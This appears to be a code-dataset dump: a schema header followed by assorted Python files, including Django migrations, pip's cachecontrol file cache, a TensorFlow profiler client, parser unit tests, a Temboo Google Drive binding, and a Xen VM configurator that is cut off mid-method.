blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e4ff0e7628f0b153ac84f54932d7be59746127b4
|
be0c6e2071945edcb47ee4f3fadc1f4629a2c6aa
|
/grandapp/migrations/0105_auto_20210224_1527.py
|
d80a750747203ef42ed7326139cdc3f30142b816
|
[] |
no_license
|
QuackenbushLab/grand
|
9719a395e6a30951c3ffdef1eccdb5e422da737c
|
f23031d1f240550d25c2842b4af0aae08c653bae
|
refs/heads/master
| 2023-08-10T09:58:58.381264
| 2023-07-25T18:23:26
| 2023-07-25T18:23:26
| 201,113,575
| 5
| 2
| null | 2022-06-24T19:11:29
| 2019-08-07T19:18:58
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,050
|
py
|
# Generated by Django 3.0.2 on 2021-02-24 15:27
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add download ``link`` and ``size`` char fields to both GGBM sample models."""

    dependencies = [
        ('grandapp', '0104_auto_20210224_0043'),
    ]

    # Both sample models gain the same pair of 200-char fields, so the
    # AddField operations are generated from a (model, field) table rather
    # than spelled out four times.
    operations = [
        migrations.AddField(
            model_name=model,
            name=field,
            field=models.CharField(default='', max_length=200),
            preserve_default=False,
        )
        for model in ('ggbmd1sample', 'ggbmd2sample')
        for field in ('link', 'size')
    ]
|
[
"marouen.b.guebila@gmail.com"
] |
marouen.b.guebila@gmail.com
|
0c87e8d62731907e5730a66a9a585858c48baab9
|
45c86c7e7c6e84dcae3eba5544d93db6bee19905
|
/venv/lib/python2.7/site-packages/pip/_vendor/cachecontrol/caches/file_cache.py
|
50d18037e88dceca1d054d694fcec1680aab9b8b
|
[] |
no_license
|
5eanpoint/moweb
|
60b5ed74183b019e04e4fa243d3c1930c4cb4a64
|
bbf0d96b651230c231115a3eace7b950a908b57e
|
refs/heads/master
| 2016-09-14T05:29:27.601814
| 2016-05-24T06:40:05
| 2016-05-24T06:40:10
| 59,546,065
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,529
|
py
|
import errno
import hashlib
import os

from pip._vendor.lockfile import LockFile
from pip._vendor.lockfile.mkdirlockfile import MkdirLockFile

from ..cache import BaseCache
from ..controller import CacheController
def _secure_open_write(filename, fmode):
    """Open *filename* for binary writing, creating it securely.

    The file is opened write-only with ``O_CREAT | O_EXCL`` so we only ever
    open a *new* file — this guarantees the permission bits passed in
    ``fmode`` are the mode the file actually ends up with.  Any pre-existing
    file at ``filename`` is removed first.

    Returns a binary file object wrapping the descriptor.
    """
    # We only want to write to this file, so open it in write only mode.
    flags = os.O_WRONLY

    # os.O_CREAT | os.O_EXCL will fail if the file already exists, so we only
    # will open *new* files.
    # We specify this because we want to ensure that the mode we pass is the
    # mode of the file.
    flags |= os.O_CREAT | os.O_EXCL

    # Do not follow symlinks to prevent someone from making a symlink that
    # we follow and insecurely open a cache file.
    if hasattr(os, "O_NOFOLLOW"):
        flags |= os.O_NOFOLLOW

    # On Windows we'll mark this file as binary.
    if hasattr(os, "O_BINARY"):
        flags |= os.O_BINARY

    # Before we open our file, we want to delete any existing file that is
    # there.
    try:
        os.remove(filename)
    except (IOError, OSError):
        # The file must not exist already, so we can just skip ahead to
        # opening.
        pass

    # Open our file; the use of os.O_CREAT | os.O_EXCL will ensure that if a
    # race condition happens between the os.remove and this line, an error
    # will be raised.  Because we utilize a lockfile this should only happen
    # if someone is attempting to attack us.
    fd = os.open(filename, flags, fmode)
    try:
        return os.fdopen(fd, "wb")
    except BaseException:
        # Wrapping the descriptor in a file object failed; close it so the
        # descriptor is not leaked.  BaseException (rather than a bare
        # ``except:``) is lint-clean while still covering KeyboardInterrupt
        # and SystemExit, preserving the original bare-except semantics.
        os.close(fd)
        raise
class FileCache(BaseCache):
    """A BaseCache that stores cached responses on disk.

    Each key is hashed (sha224) and fanned out into a 5-level directory
    tree to keep directory sizes small.  Writes are serialized with a
    lockfile and performed through a secure exclusive create.
    """

    def __init__(self, directory, forever=False, filemode=0o0600,
                 dirmode=0o0700, use_dir_lock=None, lock_class=None):
        """
        :param directory: root directory for cache files
        :param forever: if True, ``delete`` becomes a no-op
        :param filemode: permission bits for created cache files
        :param dirmode: permission bits for created directories
        :param use_dir_lock: convenience flag selecting MkdirLockFile;
            mutually exclusive with ``lock_class``
        :param lock_class: lockfile class used to serialize writes
        """
        if use_dir_lock is not None and lock_class is not None:
            raise ValueError("Cannot use use_dir_lock and lock_class together")

        if use_dir_lock:
            lock_class = MkdirLockFile

        if lock_class is None:
            lock_class = LockFile

        self.directory = directory
        self.forever = forever
        self.filemode = filemode
        self.dirmode = dirmode
        self.lock_class = lock_class

    @staticmethod
    def encode(x):
        # Hash the key so arbitrary URLs become safe, fixed-length names.
        return hashlib.sha224(x.encode()).hexdigest()

    def _fn(self, name):
        # NOTE: This method should not change as some may depend on it.
        # See: https://github.com/ionrock/cachecontrol/issues/63
        hashed = self.encode(name)
        parts = list(hashed[:5]) + [hashed]
        return os.path.join(self.directory, *parts)

    def get(self, key):
        """Return the cached bytes for *key*, or None on a cache miss."""
        name = self._fn(key)
        # EAFP: open directly instead of the previous exists()/open() pair,
        # which raced against a concurrent delete() between the check and
        # the open.  Only a missing file maps to a cache miss; any other
        # error (e.g. permissions) still propagates as before.
        try:
            fh = open(name, 'rb')
        except (IOError, OSError) as exc:
            if getattr(exc, 'errno', None) == errno.ENOENT:
                return None
            raise
        with fh:
            return fh.read()

    def set(self, key, value):
        """Store *value* (bytes) under *key*, creating directories as needed."""
        name = self._fn(key)

        # Make sure the directory exists.
        try:
            os.makedirs(os.path.dirname(name), self.dirmode)
        except (IOError, OSError):
            # Directory already exists (or could not be created); the open
            # below will surface any real problem.
            pass

        with self.lock_class(name) as lock:
            # Write our actual file.
            with _secure_open_write(lock.path, self.filemode) as fh:
                fh.write(value)

    def delete(self, key):
        """Remove the entry for *key*; a no-op when ``forever`` is set."""
        name = self._fn(key)
        if not self.forever:
            os.remove(name)
def url_to_file_path(url, filecache):
    """Return the file cache path based on the URL.

    This does not ensure the file exists!
    """
    cache_key = CacheController.cache_url(url)
    return filecache._fn(cache_key)
|
[
"seanpoint@icloud.com"
] |
seanpoint@icloud.com
|
3440ae0cb78e579db0a6945b28742609be05790a
|
0d77846403606b8300a53e05cd2103d5470b6a6a
|
/tensorflow/python/profiler/profiler_client.py
|
dc542e2c726ecdbd9c79293f77ca662075532b7a
|
[
"Apache-2.0"
] |
permissive
|
alubanana/tensorflow
|
e7cb694073773be4c46607e7af4fb8ed9c74b812
|
454f89ab3baacbac567d6bcceef4c743f23ce58b
|
refs/heads/master
| 2021-01-04T15:44:16.441471
| 2020-02-14T22:50:45
| 2020-02-14T22:56:47
| 240,614,446
| 1
| 0
|
Apache-2.0
| 2020-02-14T23:12:02
| 2020-02-14T23:12:01
| null |
UTF-8
|
Python
| false
| false
| 2,762
|
py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Profiler client APIs."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python import pywrap_tfe
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.framework import c_api_util
from tensorflow.python.framework import errors
def trace(service_addr,
          logdir,
          duration_ms,
          worker_list='',
          num_tracing_attempts=3):
  """Asks the profiler server, over grpc, for an on-demand trace.

  Blocks the calling thread until the tracing result has been received.

  Args:
    service_addr: Address of the profiler service, e.g. localhost:6009.
    logdir: TensorBoard log directory, e.g. /tmp/tb_log.
    duration_ms: How long to trace or monitor, in milliseconds.
    worker_list: Optional. Workers to profile in the current session
      (TPU only).
    num_tracing_attempts: Optional. Number of automatic retries when no
      trace event is collected (default 3).

  Raises:
    UnavailableError: If no trace event is collected.
  """
  started = pywrap_tfe.TFE_ProfilerClientStartTracing(
      service_addr, logdir, worker_list, True, duration_ms,
      num_tracing_attempts)
  if not started:
    raise errors.UnavailableError(None, None, 'No trace event is collected.')
def monitor(service_addr, duration_ms, level=1):
  """Asks the profiler server, over grpc, for on-demand monitoring data.

  Blocks the calling thread until the monitoring result has been received.

  Args:
    service_addr: Address of the profiler service, e.g. localhost:6009.
    duration_ms: How long to monitor, in milliseconds.
    level: Monitoring level, 1 or 2; level 2 is more verbose and reports
      more metrics.

  Returns:
    A string of monitoring output.
  """
  with c_api_util.tf_buffer() as buf:
    pywrap_tfe.TFE_ProfilerClientMonitor(service_addr, duration_ms, level,
                                         True, buf)
    # Extract the result while the buffer is still alive.
    return pywrap_tf_session.TF_GetBuffer(buf)
|
[
"gardener@tensorflow.org"
] |
gardener@tensorflow.org
|
d22f1d29c71d26afd2458a666800317fbbbe8db4
|
91e9d429f8e34fd48d5e34a898b32bc090660fe1
|
/core/migrations/0008_article_featured_mob_img.py
|
ab29fbd735ece0954ef2f0c6a20182b6c8281707
|
[] |
no_license
|
sherrywilly/blog-graphene
|
b286d4ba9a5a3499aefc684399630bcbd348ba8f
|
b05430896dff6b8944b2e6f5f30b6cfd875dc820
|
refs/heads/main
| 2023-07-14T22:20:29.973765
| 2021-08-07T06:35:32
| 2021-08-07T06:35:32
| 392,514,698
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 446
|
py
|
# Generated by Django 3.2.6 on 2021-08-03 09:16
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add an optional, non-editable mobile feature image to ``Article``."""

    dependencies = [
        ('core', '0007_auto_20210803_0850'),
    ]

    operations = [
        migrations.AddField(
            model_name='article',
            name='featured_mob_img',
            field=models.ImageField(
                blank=True,
                editable=False,
                null=True,
                upload_to='feature_images/',
            ),
        ),
    ]
|
[
"sherrywilson521@gmail.com"
] |
sherrywilson521@gmail.com
|
fde06b2ff44e982bb2583bb88563f02a0ba24b88
|
7cd9b9f41fdbf52de6e4393c43e3ff4e7466b417
|
/pokemon/urls.py
|
68b22f96b1bbe9442e8b4515f49e8579b6d1466c
|
[] |
no_license
|
BaeJuneHyuck/demo-pusan-univ-201907-django
|
36f5be596c6850acc211358276c66df127e05633
|
4ef9e64a42a977e0b435fb2f83842433fac53bf3
|
refs/heads/master
| 2022-01-22T21:35:57.419007
| 2019-07-23T06:51:14
| 2019-07-23T06:51:14
| 198,371,100
| 1
| 0
| null | 2019-07-23T06:56:52
| 2019-07-23T06:56:51
| null |
UTF-8
|
Python
| false
| false
| 242
|
py
|
from django.urls import path
from pokemon.views import index, pokemon_new, pokemon_edit
# URL routes for the pokemon app: list, create, and edit views.
urlpatterns = [
    path('', index),                  # pokemon list
    path('new/', pokemon_new),        # create a new pokemon
    path('<int:pk>/', pokemon_edit),  # edit the pokemon with primary key <pk>
    # re_path(r'(?P<pk>\d+)', pokemon_edit),
]
|
[
"me@askcompany.kr"
] |
me@askcompany.kr
|
b4150d116c9be477b3d501231d89ebeae46b0aa9
|
e44c1ac44a3cc912fbeaa0152b9294a03fd893ea
|
/test/test_boolean_syntax.py
|
5239ddb35aae0c52b65012e4a9d113be293c672b
|
[
"BSD-2-Clause"
] |
permissive
|
umd-lhcb/pyTuplingUtils
|
ca03db1975f7f283caab1436ac1c5d85fad75d2a
|
85f3ca90f01389f834af6de1044364843210c4c5
|
refs/heads/master
| 2023-03-10T00:12:40.922444
| 2023-03-03T23:31:09
| 2023-03-03T23:31:09
| 215,201,702
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,192
|
py
|
#!/usr/bin/env python3
#
# Authorop: Yipeng Sun
# License: BSD 2-clause
# Last Change: Thu Jun 18, 2020 at 02:47 AM +0800
import unittest
from context import pyTuplingUtils as ptu
parser = ptu.boolean.syntax.boolean_parser.parse
class ArithmeticTest(unittest.TestCase):
    """Parse-tree checks for the arithmetic subset of the boolean grammar.

    Each assertion compares the parser's ``pretty()`` dump of the parse
    tree against a literal string, so whitespace inside the expected
    strings is significant.
    """

    def test_var(self):
        # Identifiers (letters, digits, underscores) parse as 'var' nodes;
        # a leading '-' wraps the var in a 'neg' node.
        self.assertEqual(
            parser('a').pretty(),
            "var\ta\n"
        )
        self.assertEqual(
            parser('-a').pretty(),
            "neg\n"
            " var\ta\n"
        )
        self.assertEqual(
            parser('a1').pretty(),
            "var\ta1\n"
        )
        self.assertEqual(
            parser('a_1b').pretty(),
            "var\ta_1b\n"
        )

    def test_num(self):
        # Numeric literals keep their sign character in the token text.
        self.assertEqual(
            parser('1').pretty(),
            "num\t1\n"
        )
        self.assertEqual(
            parser('+1').pretty(),
            "num\t+1\n"
        )

    def test_negative_num(self):
        self.assertEqual(
            parser('-1.6').pretty(),
            "num\t-1.6\n"
        )
        self.assertEqual(
            parser('+1').pretty(),
            "num\t+1\n"
        )

    def test_add(self):
        self.assertEqual(
            parser('-1 +2.3').pretty(),
            "add\n"
            " num\t-1\n"
            " num\t2.3\n"
        )

    def test_add_sub(self):
        # '+' and '-' are left-associative: (-1 + 2.3) - 10.
        self.assertEqual(
            parser('-1 +2.3 - 10').pretty(),
            "sub\n"
            " add\n"
            " num\t-1\n"
            " num\t2.3\n"
            " num\t10\n"
        )

    def test_add_mul(self):
        # '*' binds tighter than '+': -1 + (2.3 * 10).
        self.assertEqual(
            parser('-1 +2.3 * 10').pretty(),
            "add\n"
            " num\t-1\n"
            " mul\n"
            " num\t2.3\n"
            " num\t10\n"
        )

    def test_add_mul_par(self):
        # Parentheses override precedence; negation applies to the group.
        self.assertEqual(
            parser('-(1 +2.3) * 10').pretty(),
            "mul\n"
            " neg\n"
            " add\n"
            " num\t1\n"
            " num\t2.3\n"
            " num\t10\n"
        )
class BooleanTest(unittest.TestCase):
    """Parse-tree checks for comparison and boolean operators.

    Node names: 'comp' is logical negation ('!'), 'andop'/'orop' are
    '&'/'|', and comparisons map to eq/neq/lt/lte/gt/gte nodes.
    """

    def test_comp(self):
        # '!' (complement) of a parenthesized arithmetic expression;
        # trailing whitespace in the input is ignored.
        self.assertEqual(
            parser('!(-a_2 +2.3) ').pretty(),
            "comp\n"
            " add\n"
            " neg\n"
            " var\ta_2\n"
            " num\t2.3\n"
        )

    def test_eq(self):
        self.assertEqual(
            parser('a == b').pretty(),
            "eq\n"
            " var\ta\n"
            " var\tb\n"
        )
        self.assertEqual(
            parser('a == 1').pretty(),
            "eq\n"
            " var\ta\n"
            " num\t1\n"
        )
        self.assertEqual(
            parser('a <= -1+x').pretty(),
            "lte\n"
            " var\ta\n"
            " add\n"
            " num\t-1\n"
            " var\tx\n"
        )

    def test_bool(self):
        self.assertEqual(
            parser('a & 1').pretty(),
            "andop\n"
            " var\ta\n"
            " num\t1\n"
        )
        self.assertEqual(
            parser('True | False').pretty(),
            "orop\n"
            " bool\tTrue\n"
            " bool\tFalse\n"
        )
        # '&' binds tighter than '|'.
        self.assertEqual(
            parser('True | False & True').pretty(),
            "orop\n"
            " bool\tTrue\n"
            " andop\n"
            " bool\tFalse\n"
            " bool\tTrue\n"
        )
        # Lowercase 'false' still lexes as a bool token here.
        self.assertEqual(
            parser('(True | False) & !True | false').pretty(),
            "orop\n"
            " andop\n"
            " orop\n"
            " bool\tTrue\n"
            " bool\tFalse\n"
            " comp\n"
            " bool\tTrue\n"
            " bool\tfalse\n"
        )

    def test_comb(self):
        # Mixed arithmetic, comparison, and boolean operators.
        self.assertEqual(
            parser('a >= !(-1+x)*3').pretty(),
            "gte\n"
            " var\ta\n"
            " comp\n"
            " mul\n"
            " add\n"
            " num\t-1\n"
            " var\tx\n"
            " num\t3\n"
        )
        self.assertEqual(
            parser('a >= !(-1+x)*3 | x<8 & y != -(z+3)').pretty(),
            "orop\n"
            " gte\n"
            " var\ta\n"
            " comp\n"
            " mul\n"
            " add\n"
            " num\t-1\n"
            " var\tx\n"
            " num\t3\n"
            " andop\n"
            " lt\n"
            " var\tx\n"
            " num\t8\n"
            " neq\n"
            " var\ty\n"
            " neg\n"
            " add\n"
            " var\tz\n"
            " num\t3\n"
        )
        # '&' binds tighter than '|', so the explicit parentheses in the
        # second input must not change the tree.
        self.assertEqual(
            parser('a >= !(-1+x)*3 | x<8 & y != -(z+3)').pretty(),
            parser('a >= !(-1+x)*3 | (x<8 & y != -(z+3))').pretty()
        )
class FunctionCallTest(unittest.TestCase):
    """Parse-tree checks for function-call syntax, including nesting."""

    def test_func_call_zero_arg(self):
        # A zero-argument call collapses to a single 'func_call' leaf.
        self.assertEqual(
            parser('(some_func0())').pretty(),
            "func_call\tsome_func0\n"
        )

    def test_func_call_one_arg(self):
        self.assertEqual(
            parser('some_func1(arg1)').pretty(),
            "func_call\n"
            " some_func1\n"
            " arglist\n"
            " var\targ1\n"
        )

    def test_func_call_two_args(self):
        self.assertEqual(
            parser('some_func2(arg1, arg2)').pretty(),
            "func_call\n"
            " some_func2\n"
            " arglist\n"
            " var\targ1\n"
            " var\targ2\n"
        )

    def test_func_call_arithmetic(self):
        # Arithmetic expressions are allowed as arguments.
        self.assertEqual(
            parser('arith_func((arg1+2)*val3, arg2)').pretty(),
            "func_call\n"
            " arith_func\n"
            " arglist\n"
            " mul\n"
            " add\n"
            " var\targ1\n"
            " num\t2\n"
            " var\tval3\n"
            " var\targ2\n"
        )

    def test_func_call_nested(self):
        # A call may appear inside another call's argument expression.
        self.assertEqual(
            parser('arith_func(inner(arg1+2)*val3, arg2)').pretty(),
            "func_call\n"
            " arith_func\n"
            " arglist\n"
            " mul\n"
            " func_call\n"
            " inner\n"
            " arglist\n"
            " add\n"
            " var\targ1\n"
            " num\t2\n"
            " var\tval3\n"
            " var\targ2\n"
        )

    def test_func_call_nested_boolean_op(self):
        # Calls can be operands of comparisons.
        self.assertEqual(
            parser('arith_func(inner(arg1+2)*val3, arg2) > stuff(a)').pretty(),
            "gt\n"
            " func_call\n"
            " arith_func\n"
            " arglist\n"
            " mul\n"
            " func_call\n"
            " inner\n"
            " arglist\n"
            " add\n"
            " var\targ1\n"
            " num\t2\n"
            " var\tval3\n"
            " var\targ2\n"
            " func_call\n"
            " stuff\n"
            " arglist\n"
            " var\ta\n"
        )
# Allow running this test module directly (python test_boolean_syntax.py).
if __name__ == '__main__':
    unittest.main()
|
[
"syp@umd.edu"
] |
syp@umd.edu
|
338d1428bc7508a2da49be3bd292cdb85916ced9
|
44064ed79f173ddca96174913910c1610992b7cb
|
/Second_Processing_app/temboo/Library/Google/Drive/Files/Update.py
|
5ed78c1781be712f6acaa6a31eb70220ec8e1590
|
[] |
no_license
|
dattasaurabh82/Final_thesis
|
440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5
|
8edaea62f5987db026adfffb6b52b59b119f6375
|
refs/heads/master
| 2021-01-20T22:25:48.999100
| 2014-10-14T18:58:00
| 2014-10-14T18:58:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,745
|
py
|
# -*- coding: utf-8 -*-
###############################################################################
#
# Update
# Updates the metadata or content of an existing file.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class Update(Choreography):
    """Choreo binding for /Library/Google/Drive/Files/Update.

    Updates the metadata or content of an existing Google Drive file.
    """

    def __init__(self, temboo_session):
        """
        Create a new instance of the Update Choreo. A TembooSession object, containing a valid
        set of Temboo credentials, must be supplied.
        """
        Choreography.__init__(self, temboo_session, '/Library/Google/Drive/Files/Update')

    def new_input_set(self):
        # Factory for this Choreo's input set.
        return UpdateInputSet()

    def _make_result_set(self, result, path):
        # Factory for this Choreo's result set.
        return UpdateResultSet(result, path)

    def _make_execution(self, session, exec_id, path):
        # Factory for this Choreo's asynchronous execution handle.
        return UpdateChoreographyExecution(session, exec_id, path)
class UpdateInputSet(InputSet):
    """
    An InputSet with methods appropriate for specifying the inputs to the Update
    Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
    """

    # Temboo-generated binding: each setter stores exactly one named Choreo
    # input via InputSet._set_input.

    def set_RequestBody(self, value):
        """
        Set the value of the RequestBody input for this Choreo. ((conditional, json) A JSON representation of fields in a file resource. File metadata information (such as the title) can be updated using this input. See documentation for formatting examples.)
        """
        InputSet._set_input(self, 'RequestBody', value)

    def set_AccessToken(self, value):
        """
        Set the value of the AccessToken input for this Choreo. ((optional, string) A valid access token retrieved during the OAuth2 process. This is required unless you provide the ClientID, ClientSecret, and RefreshToken to generate a new access token.)
        """
        InputSet._set_input(self, 'AccessToken', value)

    def set_ClientID(self, value):
        """
        Set the value of the ClientID input for this Choreo. ((conditional, string) The Client ID provided by Google. Required unless providing a valid AccessToken.)
        """
        InputSet._set_input(self, 'ClientID', value)

    def set_ClientSecret(self, value):
        """
        Set the value of the ClientSecret input for this Choreo. ((conditional, string) The Client Secret provided by Google. Required unless providing a valid AccessToken.)
        """
        InputSet._set_input(self, 'ClientSecret', value)

    def set_ContentType(self, value):
        """
        Set the value of the ContentType input for this Choreo. ((conditional, string) The Content-Type of the file that is being updated (i.e. image/jpeg). Required if modifying the file content.)
        """
        InputSet._set_input(self, 'ContentType', value)

    def set_Convert(self, value):
        """
        Set the value of the Convert input for this Choreo. ((optional, boolean) Whether to convert this file to the corresponding Google Docs format. (Default: false).)
        """
        InputSet._set_input(self, 'Convert', value)

    def set_Fields(self, value):
        """
        Set the value of the Fields input for this Choreo. ((optional, string) Selector specifying which fields to include in a partial response.)
        """
        InputSet._set_input(self, 'Fields', value)

    def set_FileContent(self, value):
        """
        Set the value of the FileContent input for this Choreo. ((conditional, string) The new Base64 encoded contents of the file that is being updated.)
        """
        InputSet._set_input(self, 'FileContent', value)

    def set_FileID(self, value):
        """
        Set the value of the FileID input for this Choreo. ((required, string) The id of the file to update.)
        """
        InputSet._set_input(self, 'FileID', value)

    def set_OCR(self, value):
        """
        Set the value of the OCR input for this Choreo. ((optional, boolean) Whether to attempt OCR on .jpg, .png, .gif, or .pdf uploads. (Default: false))
        """
        InputSet._set_input(self, 'OCR', value)

    def set_OcrLanguage(self, value):
        """
        Set the value of the OcrLanguage input for this Choreo. ((optional, string) If ocr is true, hints at the language to use. Valid values are ISO 639-1 codes.)
        """
        InputSet._set_input(self, 'OcrLanguage', value)

    def set_Pinned(self, value):
        """
        Set the value of the Pinned input for this Choreo. ((optional, boolean) Whether to pin the new revision. (Default: false).)
        """
        InputSet._set_input(self, 'Pinned', value)

    def set_RefreshToken(self, value):
        """
        Set the value of the RefreshToken input for this Choreo. ((conditional, string) An OAuth refresh token used to generate a new access token when the original token is expired. Required unless providing a valid AccessToken.)
        """
        InputSet._set_input(self, 'RefreshToken', value)

    def set_SetModifiedDate(self, value):
        """
        Set the value of the SetModifiedDate input for this Choreo. ((optional, boolean) Whether to set the modified date with the supplied modified date.)
        """
        InputSet._set_input(self, 'SetModifiedDate', value)

    def set_SourceLanguage(self, value):
        """
        Set the value of the SourceLanguage input for this Choreo. ((optional, string) The language of the original file to be translated.)
        """
        InputSet._set_input(self, 'SourceLanguage', value)

    def set_TargetLanguage(self, value):
        """
        Set the value of the TargetLanguage input for this Choreo. ((optional, string) Target language to translate the file to. If no sourceLanguage is provided, the API will attempt to detect the language.)
        """
        InputSet._set_input(self, 'TargetLanguage', value)

    def set_TimedTextLanguage(self, value):
        """
        Set the value of the TimedTextLanguage input for this Choreo. ((optional, string) The language of the timed text.)
        """
        InputSet._set_input(self, 'TimedTextLanguage', value)

    def set_TimedTextTrackName(self, value):
        """
        Set the value of the TimedTextTrackName input for this Choreo. ((optional, string) The timed text track name.)
        """
        InputSet._set_input(self, 'TimedTextTrackName', value)

    def set_UpdateViewedDate(self, value):
        """
        Set the value of the UpdateViewedDate input for this Choreo. ((optional, boolean) Whether to update the view date after successfully updating the file.)
        """
        InputSet._set_input(self, 'UpdateViewedDate', value)
class UpdateResultSet(ResultSet):
    """
    A ResultSet with methods tailored to the values returned by the Update Choreo.
    The ResultSet object is used to retrieve the results of a Choreo execution.
    """

    def getJSONFromString(self, str):
        # NOTE(review): the parameter name shadows the builtin ``str``;
        # kept as-is because this is Temboo-generated code and renaming
        # could break keyword-argument callers.
        return json.loads(str)

    def get_Response(self):
        """
        Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Google.)
        """
        return self._output.get('Response', None)

    def get_NewAccessToken(self):
        """
        Retrieve the value for the "NewAccessToken" output from this Choreo execution. ((string) Contains a new AccessToken when the RefreshToken is provided.)
        """
        return self._output.get('NewAccessToken', None)
class UpdateChoreographyExecution(ChoreographyExecution):
    """Execution handle for an asynchronously-run Update Choreo."""

    def _make_result_set(self, response, path):
        # Wrap the raw response in the Update-specific result set.
        return UpdateResultSet(response, path)
|
[
"dattasaurabh82@gmail.com"
] |
dattasaurabh82@gmail.com
|
9c59f9dbd1305703fbe6cfa40102879fac180355
|
de6fb3a55196b6bd36a4fda0e08ad658679fb7a1
|
/vt_manager/src/python/agent/xen/provisioning/configurators/mediacat/MediacatVMConfigurator.py
|
1c32a6c5a7a87130868b322f6583514d2cd725a1
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
dana-i2cat/felix
|
4a87af639e4c7db686bfa03f1ae4ce62711615e3
|
059ed2b3308bda2af5e1942dc9967e6573dd6a53
|
refs/heads/master
| 2021-01-02T23:12:43.840754
| 2016-02-04T10:04:24
| 2016-02-04T10:04:24
| 17,132,912
| 4
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,703
|
py
|
import shutil
import os
import jinja2
import subprocess
from xen.provisioning.hdmanagers.LVMHdManager import LVMHdManager
from xen.provisioning.HdManager import HdManager
from settings.settingsLoader import OXA_XEN_SERVER_KERNEL,OXA_XEN_SERVER_INITRD,OXA_DEBIAN_INTERFACES_FILE_LOCATION,OXA_DEBIAN_UDEV_FILE_LOCATION
class MediacatVMConfigurator:
    """Builds Xen VM configuration for Mediacat VMs.

    Dispatches between xen-create-image (paravirtualization over an LVM
    logical-volume image) and a jinja2-templated config file
    (hardware-assisted virtualization).
    """

    # Private methods

    @staticmethod
    def __createParavirtualizationVM(vm):
        # Shells out to xen-tools' xen-create-image to build the VM image.
        swap = 0
        # NOTE(review): passwd is only bound when the VM has exactly one
        # user named "root"; any other user configuration makes the Popen
        # call below fail with a NameError — confirm callers guarantee a
        # single root user.
        if len(vm.xen_configuration.users.user) == 1 and vm.xen_configuration.users.user[0].name == "root":
            passwd = str(vm.xen_configuration.users.user[0].password)
        # Swap sizing: twice the RAM, capped at 1024 MB.
        if vm.xen_configuration.memory_mb < 1024:
            swap = vm.xen_configuration.memory_mb*2
        else:
            swap = 1024
        p = subprocess.Popen(['/usr/bin/xen-create-image','--hostname=' + vm.name,'--size=' + str(vm.xen_configuration.hd_size_gb) + 'Gb','--swap=' + str(swap) + 'Mb','--memory=' + str(vm.xen_configuration.memory_mb) + 'Mb','--arch=amd64','--password=' + passwd,'--output=' + LVMHdManager.getConfigFileDir(vm), '--role=udev'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        # Block until image creation finishes.
        p.wait()

    @staticmethod
    def __createHVMFileHdConfigFile(vm,env):
        # Renders the HVM domain config from a jinja2 template.
        template_name = "mediacatHVMFileHd.pt"
        template = env.get_template(template_name)

        # Set vars & render.
        output = template.render(
            kernelImg=OXA_XEN_SERVER_KERNEL,
            initrdImg=OXA_XEN_SERVER_INITRD,
            vm=vm)

        # Write the rendered config to the VM's config-file path.
        cfile = open(HdManager.getConfigFilePath(vm),'w')
        cfile.write(output)
        cfile.close()

    # Public methods

    @staticmethod
    def getIdentifier():
        # Configurators are looked up by class name.
        return MediacatVMConfigurator.__name__

    @staticmethod
    def configureVmDisk(vm,path):
        # Intentionally a no-op for Mediacat VMs.
        return

    @staticmethod
    def createVmConfigurationFile(vm):
        # Build the jinja2 environment rooted at the local templates/ dir.
        template_dirs = []
        template_dirs.append(os.path.join(os.path.dirname(__file__), 'templates/'))
        env = jinja2.Environment(loader=jinja2.FileSystemLoader(template_dirs))

        if vm.xen_configuration.hd_setup_type == "logical-volume-image" and vm.xen_configuration.virtualization_setup_type == "paravirtualization":
            MediacatVMConfigurator.__createParavirtualizationVM(vm)
        elif vm.xen_configuration.hd_setup_type == "logical-volume-image" and vm.xen_configuration.virtualization_setup_type == "hardware-assisted-virtualization":
